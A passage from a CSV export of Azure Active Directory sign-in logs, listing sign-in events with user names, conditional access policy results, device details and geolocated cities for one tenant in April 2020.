'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 06:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",11779f6a-e330-484b-9e89-76d9ccce0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,11779f6a-e330-484b-9e89-76d9ccce0d00,SigninLogs,Sucess,50.6406517,5.572050095
+1765,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,30:12.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bb57e947-268f-48a2-b3be-3b506d01d05e,Microsoft.aadiam,Microsoft.aadiam,,Message Trace Reporting,4,NL,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Exchange Online PowerShell,[],notApplied,09/04/2020 06:30,{'deviceId': ''},3ef67224-5589-46eb-8d41-92156caa0b00,,,"{'countryOrRegion': 'NL', 'geoCoordinates': {'longitude': 4.940189838409424, 'latitude': 52.309051513671875}, 'state': 'Noord-Holland', 'city': 'Amsterdam'}",none,none,none,none,[],{'errorCode': 0},Message Trace Reporting,430f7f57-0d1a-4a8a-b8f5-5c5c0770ecaa,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,3ef67224-5589-46eb-8d41-92156caa0b00,SigninLogs,Sucess,52.30905151,4.940189838
+1766,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:02.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,164f0b67-dd3c-4d1c-b15f-834706953c3d,Microsoft.aadiam,Microsoft.aadiam,,Message Trace Reporting,4,NL,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Exchange Online PowerShell,[],notApplied,09/04/2020 06:35,{'deviceId': ''},581df607-a3b5-4d26-ad1e-df5228690c00,,,"{'countryOrRegion': 'NL', 'geoCoordinates': {'longitude': 4.940189838409424, 'latitude': 52.309051513671875}, 'state': 'Noord-Holland', 'city': 'Amsterdam'}",none,none,none,none,[],{'errorCode': 0},Message Trace Reporting,430f7f57-0d1a-4a8a-b8f5-5c5c0770ecaa,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,581df607-a3b5-4d26-ad1e-df5228690c00,SigninLogs,Sucess,52.30905151,4.940189838
+1767,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:53.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c3d52c2c-cd2f-4ec7-a466-47ac981725b5,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4f5563e9-cd91-4aaf-8dc5-b5eed7630100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4f5563e9-cd91-4aaf-8dc5-b5eed7630100,SigninLogs,Sucess,36.6404686,-78.26995087
+1768,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:04.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,63279545-87f1-4112-9cf6-11e99a03931f,Microsoft.aadiam,Microsoft.aadiam,,Sri Laxmi Sangabathula,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:01,"{'operatingSystem': 'Windows 10', 'deviceId': '1aec47a5-7dee-4fd4-be7f-5e85deea66b1', 'browser': 'Chrome 80.0.3987', 'displayName': 'SRISANG', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",4a807c8e-fb42-45b3-ad74-42e71c8c0100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.04237365722656, 'latitude': 47.62879180908203}, 'state': 'Washington', 'city': 'Sammamish'}",none,none,none,none,[],{'errorCode': 0},Sri Laxmi Sangabathula,ebd55c3c-6338-424d-ad09-46d2147f7598,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4a807c8e-fb42-45b3-ad74-42e71c8c0100,SigninLogs,Sucess,47.62879181,-122.0423737
+1769,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:23.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:51,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",f2f44b4e-dca4-4132-bb34-875707851f00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f2f44b4e-dca4-4132-bb34-875707851f00,SigninLogs,Sucess,32.0840416,34.88776016
+1770,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:28.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3fc4c47f-a758-4b3a-98d3-c78ea10a830e,Microsoft.aadiam,Microsoft.aadiam,,Sri Laxmi Sangabathula,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:02,"{'operatingSystem': 'Windows 10', 'deviceId': '1aec47a5-7dee-4fd4-be7f-5e85deea66b1', 'browser': 'Chrome 80.0.3987', 'displayName': 'SRISANG', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",6dc60ed6-65c2-4a1b-994c-e296fe640100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.04237365722656, 'latitude': 47.62879180908203}, 'state': 'Washington', 'city': 'Sammamish'}",none,none,none,none,[],{'errorCode': 0},Sri Laxmi Sangabathula,ebd55c3c-6338-424d-ad09-46d2147f7598,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,6dc60ed6-65c2-4a1b-994c-e296fe640100,SigninLogs,Sucess,47.62879181,-122.0423737
+1771,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:58.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,543b102d-ef6b-4d56-8a59-03a45cf8401b,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",41cc5746-ae7e-445a-962a-17f665ea0000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,41cc5746-ae7e-445a-962a-17f665ea0000,SigninLogs,Sucess,36.6404686,-78.26995087
+1772,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,49:47.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fdb3fe28-97cd-46af-a016-6109a9993c25,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,WindowsDefenderATP Portal,a3b79187-70b2-4139-83f9-6016c58cd27b,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:49,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e9cd98cc-4177-459a-870c-d2e4abad0700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,WindowsDefenderATP,e9cd98cc-4177-459a-870c-d2e4abad0700,SigninLogs,Sucess,50.6406517,5.572050095
+1773,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,49:47.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fdb3fe28-97cd-46af-a016-6109a9993c25,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,WindowsDefenderATP Portal,a3b79187-70b2-4139-83f9-6016c58cd27b,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 